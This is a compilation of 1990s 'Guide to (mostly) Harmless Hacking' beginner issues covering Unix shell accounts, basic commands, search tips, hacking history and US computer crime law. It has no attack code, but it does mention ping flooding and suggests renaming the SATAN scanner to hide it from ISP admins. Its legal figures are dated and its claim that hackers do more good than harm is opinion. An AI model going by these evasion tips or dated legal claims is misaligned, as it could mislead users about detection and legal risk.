How to Get a *Good* Shell Account
In this Guide you will learn how to:
· tell whether you may already have a Unix shell account
· get a shell account
· log on to your shell account
____________________________________________________________
You've fixed up your Windows box to boot up with a lurid hacker logo
...
" When you run Netscape or Internet Explorer, instead of that boring corporate logo,
you have a full-color animated Mozilla destroying New York City
...

But in your heart of hearts you know Windows is scorned by elite hackers
...
You realize that when it
comes to messing with computer networks, Unix is the most powerful operating system on the planet
...
Yes, you're ready for the
next step
...
SHELL ACCOUNT!!!!
*****************************************************
Newbie note: A shell account allows you to use your home computer as a terminal on which you can give
commands to a computer running Unix
...
With the right shell account you can enjoy the use of a far more powerful workstation than you
could ever dream of affording to own yourself
...

*****************************************************
Once upon a time the most common way to get on the Internet was through a Unix shell account
...
Almost all these swarms of surfers want just two
things: the Web, and email
...
They wouldn't know a Unix command if it hit them in the
snoot
...

The problem is that you used to be able to simply phone an ISP, say "I'd like a shell account," and they
would give it to you just like that
...
"
"Like Unix, huh? You're a hacker, aren't you!" Slam, ISP guy hangs up on you
...
So
first we will answer the question, how do you tell whether you may already have a shell account? Then, if
you are certain you don't have one, we'll explore the many ways you can get one, no matter what, from
anywhere in the world
...
There are two programs
with Windows 95 that will do this, as well as many other programs, some of which are excellent and free
...
But it's a really limited program, so I suggest that you use it only if you can't get the Hyperterminal
program to work
...

· One way is to click Start, then Programs, then Windows Explorer
...

· Then click Tools, then Find, then "Files or Folders
...
"
· It will show a file labeled C:\windows\telnet (instead of C:\ it may have another drive)
...

· This will bring up a menu that includes the option "create shortcut
...

· Close Windows Explorer
...
The easy
way is to skip to step three
...
Start up whatever program you use to access
the Internet
...
Now try step three
...

· First you need to configure Telnet so it actually is usable
...
" Choose "Courier New," "regular" and 8 point size
...
OK, OK, you can pick other fonts, but make sure that
when you close the dialog box that the Telnet program window is entirely visible on the screen
...

· Now go back to the task bar to click Connect, then under it click "Remote system
...

· Under "host name" in this box type in the last two parts of your email address
...
ISP
...
com" for host name
...
"
· Under "terminal type," in this box, choose "VT100
...

· If the connection fails, try entering the last three parts of your email address as the host, in this case
"boring
...
com
...
It may look something
like this:
Welcome to Boring Internet Services, Ltd
...
com S9 - login: cmeinel
Password:
Linux 2
...
0
...
kitty
...

sleepy:~$
If you get something like this you are in definite luck
...
If is asked for anything else, for example "logon," this is
not a shell account
...

But instead of something this simple you may get something like:
BSDI BSD/OS 2
...
com) (ttyrf)
login: galfina
Password:
Last login: Thu Apr 10 16:11:37 from fubar
...
com
[ ESCAPE
...

__________________________________________________________________
Enter your terminal type, RETURN for vt100, ? for list:
Setting terminal type to vt100
...


MAIN
Escape Main Menu
----[05:45PM]----------------------------------------------------==> H) HELP
Help & Tips for the Escape Interface
...
(M)
M) MAIL
Escape World Wide and Local Post Office (M)
F) HOME
Your Home Directory (Where all your files end up)
C) CONFIG Config your user and system options (M)
S) SHELL The Shell (Unix Environment) [TCSH]
X) LOGOUT Leave System
BACK

MAIN

HOME

MBOX

ITALK

LOGOUT

----[Mesg: Y]------------[ TAB key toggles menus ]-------[Connected: 0:00]--CMD>
In this case you aren't in a shell yet, but you can see an option on the menu to get to a shell
...
Just enter "S" and you're in
...
But if you have a shell account, you will probably
find the word "shell" somewhere on the menu
...
Call tech support and ask whether you have a shell account and, if so, how to
login
...

Now personally I don't care for the Win 95 Telnet program
...
Here's how to use the Hyperterminal program, which, like Telnet, comes
free with the Windows 95 operating system
...
Instead of a PPP
connection we will do a simple phone dialup, the same sort of connection you use to get on most computer
bulletin board systems (BBS)
...
This one is easy to find
...
You'll find Hyperterminal on the accessories menu
...
Click on the one labeled "hyperterminal
...
"
2) This brings up a dialog box called "New Connection
...

3) Make a shortcut to your desktop
...
Note that in this case you are making a direct phone call to your shell
account rather than trying to reach it through a PPP connection
...
But don't give up
...
That is the kind of connection you need in order to get pretty pictures on the Web
...
Unfortunately I've have not been able to figure out why this
happens sometimes or how to stop it
...
So if you dial again you may get a login sequence
...
Of course you can complain to tech support at
your ISP
...
Sigh
...
In fact, except for the PPP attempt problem, I like the
Hyperterminal program much better than Win 95 Telnet
...
See if you like it, too
...

They include Qmodem, Quarterdeck Internet Suite, and Bitcom
...
Ewan is free, and has many more features than either Hyperterminal or Win
95 Telnet
...
org in the /utils directory
...
But perhaps it still isn't clear
whether you have a shell account
...
At what you hope is your shell prompt, give the

command "ls -alF
...
/
drwxr-xr-x 380 root wheel 6656 Apr 22 18:15
...
README
-rw-r--r-- 1 galfina user 635 Apr 22 17:36
...
Xmodmap
...
Xresources
drwx--x--x 2 galfina user 512 Apr 22 17:36 www/
etc
...
Your shell account may give you a
different set of directories and files than this (which is only a partial listing)
...
"d" means it is a directory, and "-" means it is a file
...

"r" = read permission, "w" = write permission, and "x" = execute permission (no, "execute" has nothing to
do with murdering files, it means you have permission to run the program that is in this file)
...

The symbols in the second, third and fourth place from the left are the permissions that you have as a user,
the following three are the permissions everyone in your designated group has, and the final three are the
permissions anyone and everyone may have
...
This is the directory
where you can put your Web page
...
But only you
can read and write to it
...
" This gives you an online
Unix manual
...
For example, if you want to know all the
different ways to use the "ls" command, type "man ls" at the prompt
...
1 (dub-gw-2
...
com) (ttyp7)
Connected to CompuServe
Host Name: cis

Enter choice (LOGON, HELP, OFF):
The immediate tip-off that this is not a shell account is that it asks you to "logon" instead of "login:"

How to Get a Shell Account

What if you are certain that you don't already have a shell account? How do you find an ISP that will give
you one?
The obvious place to start is your phone book
...

So here's your problem
...
and say, "I'd like a shell account
...
SHELL
ACCOUNT!!!" He says, "Duh?" You say "Shell account
...
" Mr
...
"We don't give out shell accounts, you dirty
&%$*# hacker
...

To avoid this embarrassing scene, avoid calling big name ISPs
...

What you want to find is the seediest, tiniest ISP in town
...
Guys who impersonate grrrls on IRC
...
But these definitely are your serious Internet addicts
...

So you phone or email one of these ISPs on the back roads of the Net and say, "Greetings, d00d! I am an evil
haxor and demand a shell account pronto!"
No, no, no! Chances are you got the owner of this tiny ISP on the other end of the line
...
Guess what? He loves to hack but he doesn't want hackers (or wannabe hackers) for
customers
...

So what you do is say something like "Say, do you offer shell accounts? I really, really like to browse the
Web with lynx
...
And I like to
do email with Pine
...
IE and Netscape really s***! Lynx uber alles! What user name would you like?"
At this point, ask the owner for a guest account
...

But let's say you can't find any ISP within reach of a local phone call that will give you a shell account
...
Or you are well known as a malicious hacker and you've
been kicked off every ISP in town
...
Also, the few
medium size ISPs that offer shell accounts (for example, Netcom) may even have a local dialup number for
you
...

*************************************************
Evil Genius Tip: Sure, you can telnet into your shell account from another ISP account
...
If you get to be well known in the hacker world, lots of other hackers will
constantly be making fun of you by sniffing your password
...

One solution is to insist on a shell account provider that runs ssh (secure shell)
...
celestin
...
It provides links to Internet Service Providers categorized by geographic
region
...
Since this practice provides
the opportunity to cause s o much harm, eventually it may become really hard to get a test run on a guest
account
...
Start with a list of your
favorite hacker Web sites
...
nilenet
...
htm
...
In this case it is
"http://ra
...
com
...
In many cases it will be the home page for that ISP
...
In the case of Nile Net we strike hacker
gold:
Dial-up Accounts and Pricing
NEXUS Accounts
NEXUS Accounts include: Access to a UNIX Shell, full
Internet access, Usenet newsgroups, 5mb of FTP and/or
WWW storage space, and unlimited time
...
00
Monthly Service Fee: $19
...
95
Plus which they make a big deal over freedom of online speech
...
So now we need to
figure out how to login
...
Please remember that everyone has a first
login
...
In any case, if you are a Unix genius
you have no business reading this Beginners' Guide
...

***********************************************************
Newbie note: "Flames" are insulting, obnoxious rantings and ravings done by people who are severely
lacking in social skills and are a bunch of &$%@#!! but who think they are brilliant computer savants
...

"/dev/null" stands for "device null
...
Any data that is sent to
/dev/null is discarded
...

***********************************************************
The first thing you need to know in order to get into your shell account is your user name and password
...
The second thing you need to
remember is that Unix is "case sensitive
...
"
OK, so you have just connected to your shell account for the first time
...
But the one thing you will always see is the prompt:
login:
Here you will type in your user name
...

After this you will get some sort of a prompt
...

Or it may be a simple as:
#

**********************************************************
Newbie note: The prompt "#" usually means you have the superuser powers of a "root" account
...
But you won't see this prompt unless either the
systems administrator has been really careless -- or someone is playing a joke on you
...
But sometimes
this is just a trick the sysadmin is playing
...

**********************************************************
Ready to start hacking from your shell account? Watch out, it may be so crippled that it is worthless for
hacking
...
To
avoid these fates, be sure to read Beginners' Series #3 Part 2 of How to Get a *Good* Shell Account, coming
out tomorrow
...
Jericho is a security consultant runs his own Internet host,
obscure
...
org
...
com, and happy hacking!

GUIDE TO (mostly) HARMLESS HACKING
Beginners' Series #3 Part 2
How to Get a *Good* Shell Account
____________________________________________________________

____________________________________________________________
In this section you will learn:
· how to explore your shell account
· Ten Meinel Hall of Fame Shell Account Exploration Tools
· how to decide whether your shell account is any good for hacking
· Ten Meinel Hall of Fame LAN and Internet Exploration Tools
· Meinel Hall of Infamy Top Five Ways to Get Kicked out of Your Shell Account
____________________________________________________________

How to Explore Your Shell Account

So you're in your shell account
...
What do you do next?
A good place to start is to find out what kind of shell you have
...
To do this, at your prompt give the command "echo $SHELL
...
If you were to give the command "ECHO $shell," for
example, this command won't work
...

If you get:
/bin/bash
Then you are in the Bourne Again (bash) shell
...

If the "echo $SHELL" command doesn't work, try the command "echo $shell," remembering to use lower
case for "shell
...

Why is it important to know which shell you have? For right now, you'll want a shell that is easy to use
...
Later, though, for running those super hacker exploits, the C shell may be better for you
...
If your shell account is
any good, you will have a choice of shells
...
You may be able to get the
bash shell by simply typing the word "bash" at the prompt
...
A great book on using the bash shell is _Learning the Bash
Shell_, by Cameron Newham and Bill Rosenblatt, published by O'Reilly
...
If you don't
have one of them, when you give the command to get into that shell you will get back the answer "command
not found
...
See what riches your ISP has allowed you
to use
...
Because I am supreme arbiter of what goes into these Guides, I get to decide what the
most important commands are
...
So you're going to get the:
Ten Meinel Hall of Fame Shell Account Exploration Tools
1) man

This magic command brings up the online Unix manual
...

2) ls
Lists files
...
This will come into play down
the road for security-conscious users
...
If you see such a long list of files that they scroll off the terminal screen,
one way to solve the problem is to use "ls -alF|more
...

4) cd
Changes directories
...
For laughs, jericho suggests
exploring in /tmp
...
Also you might be able to find "less" and "cat" which are similar
commands
...

Similar commands are "find" and "locate
...

7) vi
An editing program
...
You can use it to write a really lurid file for people to read when they finger you
...
" It's another editing program and IMHO more fun than vi
...
"
8) grep
Extracts information from files, especially useful for seeing what's in syslog and shell log files
...
"
9) chmod
Change file permissions
...
If you have this command you should also find "cp" for copy file, and "mv" for move file
...
Your ISP may have decided to cripple your budding hacker
career by forbidding your access to important tools
...
In addition, you will need tools to explore both your ISP's local area network (LAN) and
the Internet
...
Dump your ISP now!
2) who
Shows you who else is currently logged in on your ISP's LAN
...
"
3) netstat
All sorts of statistics on your LAN, including all Internet connections
...
However, jericho warns "Be careful
...
She was booted off the system
the next day for 'hacker suspicion' even though both are legitimate commands for users
...

5) nslookup
Get a whole bunch more information on other Internet hosts
...
Nslookup and dig are not redundant
...

7) finger
Not only can you use finger inside your LAN
...

8) ping
Find out if a distant computer is alive and run diagnostic tests -- or just plain be a meanie and clobber people
with pings
...
)
9) traceroute
Kind of like ping with attitude
...

10) ftp
Use it to upload and download files to and from other computers
...
Stay with your ISP
...

Once you get your shell account, you will probably want to supplement the "man" command with a good
Unix book
...
"It is the ultimate Unix
command reference, and only costs 10 bucks
...
"
How to Keep from Losing Your Shell Account

So now you have a hacker's dream, an account on a powerful computer running Unix
...
The problem is that you have no right to keep that
account
...

Meinel Hall 'O Infamy
Top Five Ways to Get Kicked out of Your Shell Account
1) Abusing Your ISP
Let's say you are reading Bugtraq and you see some code for a new way to break into a computer
...
You fix up the purposely crippled stuff someone put
in to keep total idiots from running it
...
You compile and
run the program against your own ISP
...
You have been booted off your ISP
...
Otherwise you are breaking the law
...

Another temptation is to use the powerful Internet connection of your shell account (usually a T1 or T3) to
ping the crap out of the people you don't like
...
Thinking of
ICBMing or nuking that dork? Resist the temptation to abuse ping or any other Internet Control Message
Protocol attacks
...
Usually you are OK if you just briefly visit
another computer via telnet, and don't go any further than what that port offers to the casual visitor
...
(These records of port visits are stored in "messages," and
sometimes in "syslog" depending on the configuration of your target computer -- and assuming it is a Unix
system
...
If your sysadmin sees a
pattern of excessive attention to one or a few computers, he or she may assume you are plotting a break-in
...

4) Running Suspicious Programs
If you run a program whose primary use is as a tool to commit computer crime, you are likely to get kicked
off your ISP
...
Run SATAN from your shell account and you are history
...
It basically works
by telnetting to one port after another of the victim computer
...
SATAN can be used by a sysadmin to figure out how to make his or her computer safe
...

***********************************************************

5) Storing Suspicious Programs
It's nice to think that the owners of your ISP mind their own business
...
They snoop in the
directories of their users
...
OK, maybe they are really high-minded and resist the
temptation to snoop in your email
...
If they don't like what they see, next they will
be prowling your program files
...
For example, you could
rename SATAN to ANGEL
...
If any
of your programs turn out to be commonly used to commit computer crimes, you are history
...
Why get a shell account if I can get kicked out even for legal, innocuous
hacking? After all, SATAN is legal to use
...
Most hacker
tools, even if they are primarily used to commit crimes, are also educational
...

Sigh, you may as well learn the truth
...
They are OK for
beginner stuff
...
Yeah, sure
...
But that's another Guide to (mostly) Harmless Hacking (Vol
...

If you have Unix on your home computer and use a PPP connection to get into the Internet, your ISP is
much less likely to snoop on you
...
Who knows, you may end up working for your ISP!
In the meantime, you can use your shell account to practice just about anything Unixy that won't make your
sysadmin go ballistic
...
net, and keep SATAN in your home directory without
getting kicked out for suspicion of hacking? Do you want to be able to telnet in on ssh (secure shell)so no
one can sniff your password? Are you willing to pay $30 per month for unlimited access to this hacke r
playground? How about a seven day free trial account? Email haxorshell@techbroker
...

************************************************************
In case you were wondering about all the input from jericho in this Guide, yes, he was quite helpful in
reviewing this and making suggestions
...
sekurity
...
Thank you, jericho@dimensional
...
com with message "subscribe"
Want to share some kewl stuph with the Happy Hacker list? Correct mistakes? Send your messages to
hacker@techbroker
...
To send me confidential email (please, no discussions of illegal activities) use
cmeinel@techbroker
...
If
you wish your message posted anonymously, please say so! Direct flames to dev/null@techbroker
...

Happy hacking!
Copyright 1997 Carolyn P
...
You may forward or post this GUIDE TO (mostly) HARMLESS
HACKING on your Web site as long as you leave this notice at the end
...

This GTMHH may be useful even to Uberhackers (oh, no, flame alert!)
___________________________ _________________________________
Want to become really, really unpopular? Try asking your hacker friends too many questions of the wrong
sort
...
That's partly because I sincerely believe in asking dumb questions
...
People pay me lots of money to go to conferences, call people on the
phone and hang out on Usenet news groups asking dumb questions so I can find out stuff for them
...
So that's why you don't see me
flaming people who ask dumb questions
...

********************************************************
But even though dumb questions can be good to ask, you may not like the flames they bring down on you
...
The other way is to buy lots and lots of computer manuals, but that costs a lot of money
...
Fortunately, however, almost anything you
want to learn about computers and communications is available for free somewhere on the Web
...
Some just help you search the Web itself
...
Also, the best hacker email
lists are archived on the Web, as well
...
One is what search engine to use, and the
other is the search tactics themselves
...
But eventually I came to the conclusion that for serious research,
you only need two: Alavista (http://altavista
...
com)and Dejanews (http://www
...
com)
...
But, if
you don't want to take me at my word, you may surf over to a site with links to almost all the Web and
Newsgroup search engines at http://sgk
...
net/search/
...
OK, so you painfully surf through
one hacker Web site after another
...
Hey, welcome to the wannabe
hacker world!
You need to figure out some words that help the search engine of your choice get more useful results
...
Now the luser approach would to simply go to http://www
...
com
and do a search of Usenet news groups for "Carolyn Meinel," being sure to click the "old" button to bring
up stuff from years back
...
edu> 1995/11/17
Re: October El Nino-Southern Oscillation info gonthier@usgs
...
Gonthier) 1995/11/20
Re: Internic Wars MrGlucroft@psu
...
net (Christopher Proctor) 1995/12/16
Re: Lyndon LaRouche - who is he? lness@ucs
...
edu (lester john ness) 1996/01/06
U-B Color Index observation data - cmeinel@nmia
...
Meinel) 1996/05/13
Re: Mars Fraud? History of one scientist involved gksmiley@aol
...
ofthe
...
hooked
...
ca (John Anonymous MacDonald, a remailer
node) 1996/12/12
Anyhow, this list goes on and on and on
...
difi
...
it (Riccardo Mannella) 1996/12/30
Cu Digest, #8
...
cso
...
edu)
...
NIU
...
mv
...
McWilliams) 1997/01/08
Etc
...

Now suppose all you want to see is flames about what a terrible hacker I am
...
For example, a search on "Carolyn Meinel hacker
flame" with Boolean "all" turns up only one post
...

******************************************

Newbie note: "Boolean" is math term
...
But in real Boolean algebra we can use the operators "and" "or"
and "not" on word searches (or any searches of sets)
...
The "not" operator would exclude items that included the "not" term even if they have any or
all of the other search terms
...

******************************************
But let's forget all those Web search engines for a minute
...
You start at a
good spot and then follow the links to related sites
...
If you want to really whiz around the Web, and if you have a shell
account, you can do it with t he program lynx
...
Because lynx only shows text, you don't have to waste time waiting for the organ music, animated
skulls and pornographic JPEGs to load
...
Not only
do they carry archives of these Guides, they carry a lot of other valuable information for the newbie hacker,
as well as links to other quality sites
...
cs
...
edu/users/matt/hh
...
silitoad
...
You'll see some other great starting points elsewhere in this Guide,
too
...
Here's
why
...
How you break into a computer depends on all these things
...
That's one reason
breaking into computers is widely regarded as the pinnacle of hacking
...

But, OK, I'll stop hiding the secrets of universal computer breaking and entry
...
com/bugtraq
NT Bugtraq archives: http://ntbugtraq
...
on
...
html
***************************************************
You can go to jail warning: If you want to take up the sport of breaking into computers, you should either do
it with your own computer, or else get the permission of the owner if you want to break into someone else's
computer
...
In the US, if you break into a computer that is across a state
line from where you launch your attack, you are committing a Federal felony
...

***************************************************
Wait just a minute, if you surf over to those site you won't instantly become an Ubercracker
...
It's not that easy
...
Learn at least one operating
system inside and out
...
They get their phriends to give them a bunch of
canned break-in programs
...
The they get busted and run to the Electronic Freedom Foundation and
whine about how the Feds are persecuting them
...

Look, I'm a real believer in manuals
...
I read them in the bathroom,
while sitting in traffic jams, and while waiting for doctor's appointments
...
Besides, the Web stuff is free!
The most fantastic Web resource for the aspiring geek, er, hacker, is the RFCs
...
" Now this sounds like nothing more than a discussion group
...
The funny name "RFC" comes from ancient history when
lots of people were discussing how the heck to make that ARPAnet thingy work
...
"

********************************************************
Newbie note: ARPAnet was the US Advanced Research Projects Agency experiment launched in 1969 that
evolved into the Internet
...
That "D" stands for "defense
...
For example, when Bill Clinton became US President in 1993, he changed DARPA back
to ARPA because "defense" is a Bad Thing
...

********************************************************
Now ideally you should simply read and memorize all the RFCs
...
So those of us without photographic memories and gobs of free
time need to be selective about what we read
...
tstt
...
tt/pub/inet/rfc/rfcindex
...

Or, how about the RFC on RFCs! That's right, RFC 825 is "intended to clarify the status of RFCs and to
provide some guidance for the authors of RFCs in the future
...
" To
find this RFC, or in fact any RFC for which you have its number, just go to Altavista and search for "RFC
825" or whatever the number is
...

Whoa, these RFCs can be pretty hard to understand! Heck, how do we even know which RFC to read to get
an answer to our questions? Guess what, there is solution, a fascinating group of RFCs called "FYIs" Rather
than specifying anything, FYIs simply help explain the other RFCs
...
DDN
...
TXT, or RFC:RFCnnnn
...
Login with FTP,
username ANONYMOUS and password GUEST
...
Address the request to SERVICE@NIC
...
MIL and in the subject field of
the message in dicate the FYI or RFC number, as in "Subject: FYI mm" or "Subject: RFC nnnn"
...
FreeSoft
...
I can't even begin to explain to you how wonderful this site is
...
Admittedly it doesn't contain all the RFCs
...

Last but not least, you can check out two sites that offer a wealth of technical information on computer
security:
http://csrc
...
gov/secpubs/rainbow/
http://GANDALF
...
EDU/security/security
...
But please keep
this in mind
...
Sometimes it can save you a lot of grief just to ask a question
...
Hey, how
would you like to check out the Web site for those of us who make our living asking people dumb
questions? Surf over to http://www
...
org
...
So, go ahead, make someone's day
...
Just remember to fireproof your phone and computer first!

GUIDE TO (mostly) HARMLESS HACKING
Beginners' Series Number 5
Computer hacking
...

Where shall we start? Seventeen years ago and the World Science Fiction Convention in Boston,
Massachusetts? Back then the World Cons were the closest thing we had to hacker conventions
...
Ted Nelson is running around with his Xanadu guys: Roger Gregory, H
...
Eric Drexler, later to build the Foresight Institute
...
Nowadays guys at hacker cons might dress like
vampires
...
" Others at World Con are a bit more underground: doing dope, selling massages, blue boxing
the phone lines
...

Oh, but this is hardly the dawn of hacking
...
MIT students are warring for control of the school's mainframe computers
...
Back then there were no personal computers
...
Nelson later
spreads the gospel in his book Literacy Online
...
"
But in 1965 the computer is widely feared as a source of Orwellian powers
...
Few
are listening to Nelson
...

But LSD guru Timothy Leary's daughter Susan begins to study computer programming
...
, the future NSA chief scientist, decides to mutate these early hacker wars
into the first "safe hacking" environment
...
" Later
"Darwin" becomes "Core War," a free-form computer game played to this day by some of the uberest of
uberhackers
...
Wow, look at those rocks hurling through the windows of the
computer science building at the University of Illinois at Urbana-Champaign! Outside are 60s antiwar
protesters
...
Inside are nerdz high on
caffeine and nitrous oxide
...
This becomes the first realization of
cyberspace: Plato
...

In that year the Defense Department's Advanced Research Projects Agency funds a second project to hook
up four mainframe computers so researchers can share their resources
...
Its terminals just show ASCII characters: letters and numbers
...
Within a year, its users hack together a new way to ship text files
around
...
" ARPAnet has developed a life
independent of its creators
...
No one can control
cyberspace
...

Also in 1969 John Goltz teams up with a money man to found Compuserve using the new packet switched
technology being pioneered by ARPAnet
...
It is to become the gold standard of hacking and the
Internet, the operating system with the power to form miracles of computer legerdemain
...
YIPL/TAP essentially invents phreaking -- the sport
of playing with phone systems in ways the owners never intended
...
What better way to pay no phone taxes than to pay no
phone bill at all?
Blue boxes burst onto the scene
...
Suddenly phreakers are able to actually make money at their hobby
...

In June 1972, the radical left magazine Ramparts, in the article "Regulating the Phone Company In Your
Home" publishes the schematics for a variant on the blue box known as the "mute box
...
7, which outlaws the selling of "plans or instructions for any
instrument, apparatus, or device intended to avoid telephone toll charges
...
The financial
stress leads quickly to bankruptcy
...

Computer graphics, almost unheard of in that day, are displayed by touch-sensitive vector graphics
terminals
...
Virtual pilots fly out of digital airports and try to shoot each other down and bomb each others'
airports
...
"I'm about to shoot you
down
...
I dive and turn hoping to get my tormentor into my sights
...
My terminal displays the message "You just pulled 37 Gs
...
"
One day the Starship Enterprise barges in on our simulator, shoots everyone down and vanishes back into
cyberspace
...
")
1975
...
Altair
...
Bill Gates writes the operating system
...

Remember Hans and Gribble? They join the Home Brew Computer club and choose Motorola
microprocessors to build their own
...
A computer religion is born
...
Us hackers suddenly have boxes that beat the heck out of
Tektronix terminals
...

Soon, linked by nothing more than the long distance telephone network and these bulletin board nodes,
hackers create a new, private cyberspace
...

Also in 1978, The Source and Compuserve computer networks both begin to cater to individual users
...
The first cybercafe, Planet Earth, opens in Washington, DC
...
25 networks reign supreme
...
In a giant leap it moves from Network Control Protocol
to Transmission Control Protocol/Internet Protocol (TCP/IP)
...
The framework that would someday unite hackers around the world was now, ever so
quietly, growing
...

Famed science fiction author Jerry Pournelle discovers ARPAnet
...
ARPAnet's administrators are surprisingly easygoing about
granting accounts, especially to people in the academic world
...
But unlike
the glitzy Plato, ARPAnet is really hackable and now has what it takes to grow
...
It's all local and it's all free
...
Phreaking is more hazardous than ever
...
Joe College sits down at his dumb terminal to the University
DEC 10 and decides to poke around the campus network
...
A message pops up: "Warning: playing with sex is hazardous
...
" Joe is
weeping, cursing, jumping up and down
...
Nothing! Zilch! Nada! He runs to
the sysadmin
...
A prank
...
MITs "Jargon file" defines hacker as merely "a person who enjoys learning about computer
systems and how to stretch their capabilities; a person who programs enthusiastically and enjoys
dedicating a great deal of time with computers
...
The
empire of the CP/M operating system falls
...
The Amiga hangs on by a thread
...
Sneaking around college labs at night fades from the scene
...
Congress passes the Comprehensive Crime Control Act giving t he US Secret Service jurisdiction over
computer fraud
...

1984
...
Instead, science fiction author William Gibson, writing
Neuromancer on a manual typewriter, coins the term and paints the picture of "cyberspace
...
who ever ran in Earth's computer matrix
...
"
In 1984 the first US police "sting" bulletin board systems appear
...

The 80s are the war dialer era
...
25 networks, the vast majority of computers can
only be accessed b y discovering their individual phone lines
...

Computers of this era might be running any of dozens of arcane operating systems and using many
communications protocols
...
The hacker scene operates on the
mentor principle
...
Kevin Poulson makes a name for himself through many daring burglaries of Pacific Bell
...
According to a list of hacker groups
compiled by the editors of Phrack on August 8, 1988, the US hosts hundreds of them
...

In 1988 Robert Tappan Morris, son of NSA chief scientist Robert Morris Sr
...
It uses a combination of finger and sendmail exploits to break into a
computer, copy itself and then send copy after copy on to other computers
...
Soon vulnerable
computers are filled to their digital gills with worms and clogging communications links as they send copies
of the worms out to hunt other computers
...
Morris is arrested, but gets off with probation
...
Inspired by
Nelson's Xanadu, Tim Berners-Lee of the European Laboratory for Particle Physics (CERN) conceives of a
new way to implement hypertext
...
In 1991 he quietly unleashes it on the
world
...
Nelson's Xanadu, like Plato, like CP/M, fades
...
The US Secret Service and New
York State Police raid Phiber Optik, Acid Phreak, and Scorpion in New York City, and arrest Terminus,
Prophet, Leftist, and Urvile
...
It
raids both Richard Andrews' home and business
...
A famous unreasonable
raid that year was the Chicago Task Force invasion of Steve Jackson Games, Inc
...
Its initial purpose is to protect hackers
...

In 1993, Marc Andreesson and Eric Bina of the National Center for Supercomputing Applications release
Mosaic, the first WWW browser that can show graphics
...
Soon the Web
becomes the number one way that hackers boast and spread the codes for their exploits
...

In 1993, the first Def Con invades Las Vegas
...

1996 Aleph One takes over the Bugtaq email list and turns it into the first public "full disclosure" computer
security list
...
Bugtraq archives are placed on the Web
...
They are full of simple instructions
designed to help novices understand hacking
...

1996 is also the year when documentation for routers, operating systems, TCP/IP protocols and much, much
more begins to proliferate on the Web
...

In early 1997 the readers of Bugtraq begin to tear the Windows NT operating system to shreds
...

Self-proclaimed hackers Mudge and Weld of The L0pht, in a tour de force of research, write and release a
password cracker for WinNT that rocks the Internet
...

Thanks to the willingness of hackers to share their knowledge on the Web, and mail lists such as Bugtraq,
NT Bugtraq and Happy Hacker, the days of people having to beg to be inducted into hacker gangs in order
to learn hacking secrets are now fading
...


Contents of the Crime Volume:
Computer Crime Law Issue #1
Everything a hacker needs to know about getting busted by the feds
____________________________________________________________

GUIDE TO (mostly) HARMLESS HACKING
Computer Crime Law Issue #1
By Peter Thiruselvam ...
com> and Carolyn Meinel
______________________________________________________ ______
Tired of reading all those “You could go to jail” notes in these guides? Who says those things are crimes?
Well, now you can get the first in a series of Guides to the gory details of exactly what laws we’re trying to
keep you from accidentally breaking, and who will bust you if you go ahead with the crime anyhow
...
”
Now these are not the *only* computer crime laws
...

COMPUTER CRIMES: HOW COMMON? HOW OFTEN ARE THEY REPORTED?
The FBI’s national Computer Crimes Squad estimates that between 85 and 97 percent of computer intrusions
are not even detected
...
Attempts were made to attack a total of 8932 systems participating in the test
...
The management of only 390 of those 7860 systems detected the
attacks, and only 19 of the managers reported the attacks (Richard Power, -Current and Future Danger: A
CSI Primer on Computer Crime and Information Warfare_, Computer Security Institute, 1995
...
”
Besides, of the computer crimes that *are* reported, few are ever solved
...
g
...

In fact, on the average, it has been our experience that hackers do far more good than harm
...
It’s far more likely to be some guy in a suit who is an employee of his victim
...

· It involves a computer owned by a U
...
government department or agency
...

· It involves interstate or foreign communications
...

Of these offenses, the FBI ordinarily has jurisdiction over cases involving national security, terrorism,
banking, and organized crime
...
S
...
S
...
g
...
In certain federal cases, the customs Department, the
Commerce Department, or a military organization, such as the Air Force Office of Investigations, may have
jurisdiction
...
The Computer Fraud and Abuse Act of 1986 is
the main piece of legislation that governs most common computer crimes, although many other laws may be
used to prosecute different types of computer crime
...
It
also complemented the Electronic Communications Privacy Act of 1986, which outlawed the unauthorized
interception of digital communications and had just recently been passed
...

In addition to federal laws, most of the states have adopted their own computer crime laws
...

THE BIG NO NO’S -- THE TWO MOST IMPORTANT FEDERAL CRIME LAWS
As mentioned above, the two most important US federal computer crime laws are 18 USC: Chapter 47,
Sections 1029 and 1030
...
The nine areas of criminal
activity covered by Section 1029 are listed below
...

1
...
(The offense must be committed knowingly
and with intent to defraud
...

2
...
(The offense must be committed knowingly and with intent to defraud
...

3
...
(The offense must be committed
knowingly and with intent to defraud
...

4
...
(The offense must be committed
knowingly and with intent to defraud
...

5
...
(The offense must be committed
knowingly and with intent to defraud
...

6
...
(The offense must be committed knowingly and with intent to defraud, and
without the authorization of the issuer of the access device
...

7
...
(The offense must be committed
knowingly and with intent to defraud
...

Penalty: Fine of $50,000 or twice the value of the crime and/or up to 15 years in prison, $100,000 and/or up to
20 years if repeat offense
...
Using, producing, trafficking in, or having a scanning receiver or hardware or software used to alter or
modify telecommunications instruments to obtain unauthorized access to telecommunications services
...
We just had a big
scandal when the news media got a hold of an intercepted cell phone call from Speaker of the US House of
Representatives Newt Gingrich
...

9
...
(The offense must be committed knowingly and with
intent to defraud, and without the authorization of the credit card system member or its agent
...

SECTION 1030

18 USC, Chapter 47, Section 1030, enacted as part of the Computer Fraud and Abuse Act of 1986, prohibits
unauthorized or fraudulent access to government computers, and establishes penalties for such access
...
Under the
Computer Fraud and Abuse Act, the U
...
Secret Service and the FBI explicitly have been given jurisdiction
to investigate the offenses defined under this act
...
Acquiring national defense, foreign relations, or restricted atomic energy information with the intent or
reason to believe that the information can be used to injure the United States or to the advantage of any
foreign nation
...
)
2
...
(The offense must be committed intentionally by
accessing a computer without authorization or exceeding authorized access
...
We hope this fellow was lying
and simply paid the fee to purchase the report
...

3
...
S
...
(The offense must be committed intentionally by accessing a computer without
authorization
...
Please remember to tiptoe around computers with
...
gov domain
names!
Penalty: Fine and/or up to 1 year in prison, up to 10 years if repeat offense
...
Furthering a fraud by accessing a federal interest computer and obtaining anything of value, unless the
fraud and the thing obtained consists only of the use of the computer
...
)[The government’s
view of “federal interest computer” is defined below]
Watch out! Even if you download copies of programs just to study them, this law means if the owner of the
program says, “Yeah, I’d say it’s worth a million dollars,” you’re in deep trouble
...

5
...
There are two separate scenarios:
a
...

The most common way someone gets into trouble with this part of the law is when trying to cover tracks
after breaking into a computer
...
Or some command he or she gives may accidentally mess things up
...
Just ask any systems administrator about giving commands as
root
...

A simple email bomb attack, “killer ping,” flood ping, syn flood, and those huge numbers of Windows NT
exploits where sending simple commands to many of its ports causes a crash could also break this law
...

b
...

